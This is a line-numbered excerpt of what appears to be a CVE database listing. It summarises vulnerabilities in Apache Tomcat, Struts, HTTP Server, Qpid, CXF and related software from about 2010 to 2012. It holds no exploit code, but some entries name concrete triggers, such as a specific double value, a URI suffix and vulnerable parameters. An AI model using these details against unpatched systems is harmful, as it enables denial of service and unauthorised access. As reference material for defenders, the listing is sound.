5585| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
5586| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
5587| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
5588| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
5589| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
5590| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
5591| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5592| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
5593| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
5594| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
5595| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
5596| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
5597| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
5598| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
5599| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
5600| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
5601| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
5602| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
5603| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
5604| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
5605| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
5606| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
5607| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
5608| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
5609| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
5610| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
5611| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
5612| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
5613| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
5614| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
5615| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
5616| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
5617| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
5618| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
5619| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
5620| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
5621| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
5622| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
5623| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
5624| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
5625| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
5626| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
5627| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
5628| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
5629| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
5630| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
5631| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
5632| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
5633| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
5634| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
5635| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
5636| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
5637| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
5638| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
5639| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
5640| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
5641| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
5642| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
5643| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
5644| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
5645| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
5646| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
5647| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
5648| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
5649| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
5650| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
5651| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
5652| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
5653| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
5654| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
5655| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
5656| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
5657| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
5658| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
5659| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
5660| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
5661| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
5662| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
5663| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
5664| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
5665| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
5666| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
5667| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
5668| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
5669| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
5670| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
5671| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
5672| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
5673| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
5674| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
5675| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
5676| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
5677| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
5678| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
5679| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
5680| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
5681| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
5682| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
5683| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
5684| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
5685| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
5686| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
5687| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
5688| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
5689| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
5690| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5691| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
5692| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
5693| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
5694| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
5695| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
5696| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
5697| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
5698| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
5699| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
5700| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
5701| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
